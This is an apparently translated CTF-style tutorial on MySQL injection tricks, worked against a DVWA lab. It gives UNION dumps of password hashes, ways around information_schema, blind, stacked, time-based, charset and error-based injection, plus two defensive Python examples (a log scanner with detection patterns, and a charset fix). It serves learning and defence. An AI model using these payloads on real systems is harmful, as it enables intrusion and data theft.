
SQL Injection Techniques: MySQL Injection Tricks

This article comes from the “白帽子社区知识星球” (White Hat Community Knowledge Planet).




These are some injection tricks I collected from CTF competitions and everyday reading; I hope they are useful to everyone.

01

Environment setup
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.7.26    |
+-----------+
1 row in set (0.00 sec)
mysql> use dvwa;
Database changed
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.00 sec)
mysql> select * from users;
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                           | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |            0 |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)

02

Bypassing information_schema


Commonly used metadata sources for injection:

information_schema

sys schema

innodb


information_schema


# Dump the database name:
1' union select 1,database(),3#
# 1' union select schema_name from information_schema.schemata#
# Dump table names:
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="dvwa"#
# Dump column names:
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" #
# Read data:
1' union select 1,password,3 from users#
# group_concat(column_name) can be replaced with unhex(Hex(cast(column_name as char)))column_name
# select 1,2,3,unhex(Hex(cast(column_name as char)))column_name from information_schema.columns where table_name="users";
# group_concat can be replaced with concat_ws(',',id,users,password )


sys schema


A new feature of MySQL 5.7


sys.schema_table_statistics_with_buffer


mysql> select table_schema from sys.x$schema_table_statistics_with_buffer;
+--------------+
| table_schema |
+--------------+
| dvwa         |
| dvwa         |
| zzcms        |
+--------------+
3 rows in set (0.05 sec)
mysql> select table_name from sys.x$schema_table_statistics_with_buffer where table_schema='dvwa';
+------------+
| table_name |
+------------+
| users      |
| guestbook  |
+------------+
2 rows in set (0.04 sec)
mysql> select password from users;
+----------------------------------+
| password                         |
+----------------------------------+
| 5f4dcc3b5aa765d61d8327deb882cf99 |
| e99a18c428cb38d5f260853678922e03 |
| 8d3533d75ae2c3966d7e0d4fcc69216b |
| 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
+----------------------------------+
5 rows in set (0.00 sec)


MySQL 5.7.9 added several views to sys from which table names can be obtained:


// view names that contain "in"
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
// view names that do not contain "in"
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
// get table names from the storage paths of the table files
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();


Views that contain previously executed queries


SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();


performance_schema


SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();


Tables that contain previously executed queries


SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();


Tables that contain table file paths


# SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
+-------------------------------------------------------------------------+
| file_name                                                               |
+-------------------------------------------------------------------------+
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\db.opt        |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.frm     |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.MYI     |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.MYD     |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.frm |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.MYI |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.MYD |
+-------------------------------------------------------------------------+
7 rows in set (0.00 sec)



innodb


MySQL > 5.6.x

MySQL has the InnoDB storage engine turned off by default


mysql> select table_name from mysql.innodb_table_stats where database_name = 'dvwa';
mysql> select table_name from mysql.innodb_index_stats where database_name = 'dvwa';


03

MySQL injection without column names
mysql> select 1,2,3,4,5,6,7,8 union select * from users;
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
| 1 | 2      | 3       | 4       | 5                                | 6                                | 7                   | 8    |
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
| 1 | 2      | 3       | 4       | 5                                | 6                                | 7                   |    8 |
| 1 | admin  | admin   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |    0 |
| 2 | Gordon | Brown   | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |    0 |
| 3 | Hack   | Me      | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |    0 |
| 4 | Pablo  | Picasso | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |    0 |
| 5 | Bob    | Smith   | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |    0 |
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
6 rows in set (0.00 sec)
mysql> select `3` from (select 1,2,3,4,5,6,7,8 union select * from users)a;
+---------+
| 3       |
+---------+
| 3       |
| admin   |
| Brown   |
| Me      |
| Picasso |
| Smith   |
+---------+
6 rows in set (0.00 sec)
mysql> select b from (select 1,2,3 as b,4,5,6,7,8 union select * from users)a;
+---------+
| b       |
+---------+
| 3       |
| admin   |
| Brown   |
| Me      |
| Picasso |
| Smith   |
+---------+
6 rows in set (0.00 sec)
mysql> select concat(b,'~',c) from (select 1,2,3 as b,4,5 as c,6,7,8 union select * from users)a;
+------------------------------------------+
| concat(b,'~',c)                          |
+------------------------------------------+
| 3~5                                      |
| admin~5f4dcc3b5aa765d61d8327deb882cf99   |
| Brown~e99a18c428cb38d5f260853678922e03   |
| Me~8d3533d75ae2c3966d7e0d4fcc69216b      |
| Picasso~0d107d09f5bbe40cade3de5c71e9e9b7 |
| Smith~5f4dcc3b5aa765d61d8327deb882cf99   |
+------------------------------------------+
6 rows in set (0.00 sec)
############################################
mysql> select (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,
(select 6)f,(select 7)g,(select 8)h;
+---+---+---+---+---+---+---+---+
| a | b | c | d | e | f | g | h |
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h;
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select * from users;
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
| 1 | 2      | 3       | 4       | 5                                | 6                                | 7                   | 8    |
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
| 1 | 2      | 3       | 4       | 5                                | 6                                | 7                   |    8 |
| 1 | admin  | admin   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |    0 |
| 2 | Gordon | Brown   | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |    0 |
| 3 | Hack   | Me      | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |    0 |
| 4 | Pablo  | Picasso | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |    0 |
| 5 | Bob    | Smith   | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |    0 |
+---+--------+---------+---------+----------------------------------+----------------------------------+---------------------+------+
6 rows in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select * from users)k;
+----------------------------------+
| 5                                |
+----------------------------------+
| 5                                |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
| e99a18c428cb38d5f260853678922e03 |
| 8d3533d75ae2c3966d7e0d4fcc69216b |
| 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
+----------------------------------+
6 rows in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select * from users)k limit 3,1;
+----------------------------------+
| 5                                |
+----------------------------------+
| 8d3533d75ae2c3966d7e0d4fcc69216b |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select * from users)k limit 1 offset 3;
+----------------------------------+
| 5                                |
+----------------------------------+
| 8d3533d75ae2c3966d7e0d4fcc69216b |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id=1 union select (select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select * from users)k limit 1 offset 3)i,(select 2)o,(select 3)u,(select 4)y,(select 5)t,(select 6)r,(select 7)w,(select 8)q;
+----------------------------------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
| user_id                          | first_name | last_name | user  | password                         | avatar                         | last_login          | failed_login |
+----------------------------------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
| 1                                | admin      | admin     | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-03 19:28:04 |            0 |
| 8d3533d75ae2c3966d7e0d4fcc69216b | 2          | 3         | 4     | 5                                | 6                              | 7                   |            8 |
+----------------------------------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
2 rows in set (0.00 sec)


04

Blind injection using ORDER BY

The ORDER BY clause sorts the result set by the specified column(s). By default, ORDER BY sorts records in ascending order.


order by rand(true) and order by rand(false) produce different orderings of the result.


# order by rand(database()='dvwa')
mysql> select * from users order by rand(true);
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                           | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |            0 |
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |            0 |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
mysql> select * from users order by rand(false);
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                           | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |            0 |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)


Blind injection using the difference in sort order on a specified column


mysql> select user_id,password from users where user_id=1;
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'4' order by 2;
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 4                                |
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'6' order by 2;
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 6                                |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'5e' order by 2;
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 5e                               |
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'5g' order by 2;
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 5g                               |
+---------+----------------------------------+
2 rows in set (0.00 sec)


05

Stacked injection
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| mysql              |
| performance_schema |
| seacms             |
| sys                |
| thinkcmf           |
| wellcms            |
| xxl-job            |
| zzcms              |
+--------------------+
10 rows in set (0.00 sec)
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.00 sec)
mysql> show columns from users;
+--------------+-------------+------+-----+-------------------+-----------------------------+
| Field        | Type        | Null | Key | Default           | Extra                       |
+--------------+-------------+------+-----+-------------------+-----------------------------+
| user_id      | int(6)      | NO   | PRI | NULL              |                             |
| first_name   | varchar(15) | YES  |     | NULL              |                             |
| last_name    | varchar(15) | YES  |     | NULL              |                             |
| user         | varchar(15) | YES  |     | NULL              |                             |
| password     | varchar(32) | YES  |     | NULL              |                             |
| avatar       | varchar(70) | YES  |     | NULL              |                             |
| last_login   | timestamp   | NO   |     | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP |
| failed_login | int(3)      | YES  |     | NULL              |                             |
+--------------+-------------+------+-----+-------------------+-----------------------------+
8 rows in set (0.00 sec)


Prepared statements


mysql> select user_id,first_name,password from users;
+---------+------------+----------------------------------+
| user_id | first_name | password                         |
+---------+------------+----------------------------------+
|       1 | admin      | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       2 | Gordon     | e99a18c428cb38d5f260853678922e03 |
|       3 | Hack       | 8d3533d75ae2c3966d7e0d4fcc69216b |
|       4 | Pablo      | 0d107d09f5bbe40cade3de5c71e9e9b7 |
|       5 | Bob        | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+------------+----------------------------------+
5 rows in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=3;
+---------+------------+----------------------------------+
| user_id | first_name | password                         |
+---------+------------+----------------------------------+
|       3 | Hack       | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=3;SET @sql=CONCAT('se','lect * from `users`;');PREPARE exp from @sql;EXECUTE exp;#
+---------+------------+----------------------------------+
| user_id | first_name | password                         |
+---------+------------+----------------------------------+
|       3 | Hack       | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
Statement prepared
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                           | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg   | 2021-05-03 19:28:04 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg    | 2021-05-03 19:28:04 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg   | 2021-05-03 19:28:04 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg  | 2021-05-03 19:28:04 |            0 |
+---------+------------+-----------+---------+----------------------------------+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)


HANDLER queries


mysql> select user_id,first_name,password from users where user_id=3;handler `users` open;handler `users` read first;#
+---------+------------+----------------------------------+
| user_id | first_name | password                         |
+---------+------------+----------------------------------+
|       3 | Hack       | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
+---------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user  | password                         | avatar                         | last_login          | failed_login |
+---------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-03 19:28:04 |            0 |
+---------+------------+-----------+-------+----------------------------------+--------------------------------+---------------------+--------------+
1 row in set (0.00 sec)


Modifying the table structure


# Rename the words table to words1, then rename the numerically named table to words, so the numeric table becomes the one queried by default; it lacks an id column, so change the flag column to id
1';
rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#
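As an added defender-side example that is not part of the original post, this Python scanner runs over constructed MySQL general-log lines and flags the two signals described in sections 02 and 05: schema lookups routed through sys, performance_schema or the mysql.innodb_*_stats tables instead of information_schema, and PREPARE/EXECUTE, HANDLER, RENAME TABLE or ALTER TABLE statements arriving stacked on an application connection. The log line format and the regular expressions are this example's own assumptions.

```python
import re
from typing import List, NamedTuple

# Constructed sample in MySQL general-log file format ("<timestamp> <thread_id>
# <command> <argument>", one entry per line here). Not from a real server; the
# statements are the ones shown in sections 02 and 05 of this post.
SAMPLE_LOG = """\
2021-05-03T19:30:01.000000Z   12 Query SELECT first_name FROM users WHERE user_id = 1
2021-05-03T19:30:02.000000Z   12 Query SELECT table_name FROM sys.x$schema_table_statistics_with_buffer WHERE table_schema='dvwa'
2021-05-03T19:30:03.000000Z   12 Query SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE()
2021-05-03T19:30:04.000000Z   12 Query select table_name from mysql.innodb_table_stats where database_name = 'dvwa'
2021-05-03T19:30:05.000000Z   13 Query select user_id,first_name,password from users where user_id=3;SET @sql=CONCAT('se','lect * from `users`;');PREPARE exp from @sql;EXECUTE exp;#
2021-05-03T19:30:06.000000Z   13 Query select user_id,first_name,password from users where user_id=3;handler `users` open;handler `users` read first;#
2021-05-03T19:30:07.000000Z   13 Query select * from words where id='1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#
2021-05-03T19:31:00.000000Z   14 Query SELECT COUNT(*) FROM guestbook
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Schema metadata reached without information_schema (section 02): any object in
# sys or performance_schema, plus the two InnoDB statistics tables in mysql.
METADATA_BYPASS = re.compile(
    r"\b(?:sys|performance_schema)`?\s*\.\s*`?[\w$]+"
    r"|\bmysql`?\s*\.\s*`?innodb_(?:table|index)_stats",
    re.IGNORECASE,
)
# Statements an application's ordinary query path does not issue (section 05).
ADMIN_STATEMENT = re.compile(
    r"\b(?:PREPARE\s+\w+\s+FROM|EXECUTE\s+\w+|HANDLER\s+`?\w+`?\s+(?:OPEN|READ)"
    r"|RENAME\s+TABLES?|ALTER\s+TABLE)\b",
    re.IGNORECASE,
)
# A ';' with more text after it means several statements in one query string.
# Deliberately crude: a ';' inside a string literal also counts, which errs
# towards flagging rather than missing a stacked query.
STATEMENT_SEP = re.compile(r";\s*(?=\S)")


class Finding(NamedTuple):
    thread: str
    kind: str
    detail: str


def scan_general_log(text: str) -> List[Finding]:
    """Return one Finding per suspicious pattern found in each Query entry."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        thread, sql = m.group("thread"), m.group("arg")
        for hit in METADATA_BYPASS.finditer(sql):
            findings.append(Finding(thread, "metadata_bypass", hit.group(0)))
        for hit in ADMIN_STATEMENT.finditer(sql):
            findings.append(Finding(thread, "admin_statement", hit.group(0)))
        if len(STATEMENT_SEP.split(sql)) > 1:
            findings.append(Finding(thread, "stacked_statements", sql[:60]))
    return findings


def suspicious_threads(findings: List[Finding]) -> List[str]:
    """Connection ids worth tracing back to the web request that issued them."""
    return sorted({f.thread for f in findings}, key=int)


if __name__ == "__main__":
    results = scan_general_log(SAMPLE_LOG)
    for f in results:
        print(f"thread {f.thread}: {f.kind:<20} {f.detail}")
    print("threads to investigate:", suspicious_threads(results))
```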


06

Time-based blind injection


1. sleep(x)

2. benchmark()

3. select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C

4. get_lock

5. rlike+rpad


07

New injection-relevant features in MySQL 8.0


  1. TABLE has functionality similar to SELECT

  2. VALUES can construct a table


08

MySQL character-encoding behaviour


By default, MySQL's character set is latin1.

When the character set of a MySQL column differs from the one the PHP mysqli client sets, for example with set names utf8;, a vulnerability may exist.


In that case latin1 characters such as Â can be used to bypass PHP's check.


If username=admin%c2 is passed in, PHP's check if ($username === 'admin') is naturally bypassed, while MySQL still returns the rows for username='admin'.


When converting between character sets, MySQL silently drops the incomplete character.
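To show why the PHP check and the database disagree, here is an added Python model (not code from the original post) of the admin%c2 case described above, with the strict-decoding fix beside it. Modelling MySQL's conversion as UTF-8 decoding that drops the incomplete trailing byte is this example's own simplifying assumption.

```python
from typing import Dict, Optional

# Constructed lookup table standing in for the DVWA users table: username -> user_id.
USERS: Dict[str, int] = {"admin": 1, "gordonb": 2, "1337": 3, "pablo": 4, "smithy": 5}


def mysql_lenient_convert(raw: bytes) -> str:
    """Simplified model of the behaviour the post describes: with SET NAMES utf8
    on the connection and a latin1 column, MySQL drops the incomplete trailing
    multi-byte sequence while converting, so b"admin\\xc2" becomes "admin".
    This models the observed effect only; it is not MySQL's conversion code."""
    return raw.decode("utf-8", errors="ignore")


def vulnerable_lookup(raw_username: bytes) -> Optional[int]:
    """Byte-exact deny check (PHP's ===) followed by a lookup that goes through
    the lenient conversion. The check and the database disagree about what the
    value is, which is the gap the post's admin%c2 payload slips through."""
    if raw_username == b"admin":  # meant to stop anyone logging in as admin
        return None
    return USERS.get(mysql_lenient_convert(raw_username))


def hardened_lookup(raw_username: bytes) -> Optional[int]:
    """Fix: decode strictly so malformed UTF-8 is rejected instead of repaired,
    and apply the deny check to the same decoded value the database will see.
    In the real application also make the connection and column charsets agree
    (e.g. mysqli_set_charset()) so the server has nothing left to convert."""
    try:
        username = raw_username.decode("utf-8")  # raises on b"admin\xc2"
    except UnicodeDecodeError:
        return None
    if username == "admin":
        return None
    return USERS.get(username)


if __name__ == "__main__":
    payload = b"admin\xc2"  # admin%c2 after URL decoding
    print("vulnerable:", vulnerable_lookup(payload))  # 1: the deny check was bypassed
    print("hardened:  ", hardened_lookup(payload))    # None: rejected as malformed input
```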


09

MySQL and error-based injection


When a derived table is given an alias, it cannot contain duplicate column names. Use JOIN to duplicate the table into two copies; when the result is aliased as c, the duplicate column is detected and its name appears in the error message. Then use USING to leak the other columns one at a time.


mysql> select user_id,first_name,password from users where user_id=1;
+---------+------------+----------------------------------+
| user_id | first_name | password                         |
+---------+------------+----------------------------------+
|       1 | admin      | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=1 and (select * from (select * from users as a join users as b) as c);
ERROR 1060 (42S21): Duplicate column name 'user_id'
mysql> select user_id,first_name,password from users where user_id=1 and (select * from (select * from users as a join users as b using(user_id)) as c);
ERROR 1060 (42S21): Duplicate column name 'first_name'
mysql> select user_id,first_name,password from users where user_id=1 and (select * from (select * from users as a join users as b using(user_id, first_name)) as c);
ERROR 1060 (42S21): Duplicate column name 'last_name'

mysql> select user_id,first_name,password from users where user_id=1 and (select * from (select * from users as a join users as b using(user_id, first_name, last_name)) as c);
ERROR 1060 (42S21): Duplicate column name 'user'



Polygon(1)


Polygon(1) raises an error; if an existing column is passed in instead, the error message reveals the database, table and column names.


mysql> select user_id,first_name,password from users where user_id=1 and Polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select user_id,first_name,password from users where user_id=1 and Polygon(user_id);
ERROR 1367 (22007): Illegal non geometric '`dvwa`.`users`.`user_id`' value found during parsing


A schema can hold various built-in or user-defined functions; if a function does not exist, the error reports that this schema has no such function, revealing the schema name.


mysql> select user_id,first_name,password from users where user_id=1-a();
ERROR 1305 (42000): FUNCTION dvwa.a does not exist



10

ASCII offset and blind injection
mysql> select (select 'b') > (select 'flag');
+--------------------------------+
| (select 'b') > (select 'flag') |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'g') > (select 'flag');
+--------------------------------+
| (select 'g') > (select 'flag') |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'fa') > (select 'flag');
+---------------------------------+
| (select 'fa') > (select 'flag') |
+---------------------------------+
|                               0 |
+---------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'fl') > (select 'flag');
+---------------------------------+
| (select 'fl') > (select 'flag') |
+---------------------------------+
|                               0 |
+---------------------------------+
1 row in set (0.00 sec)
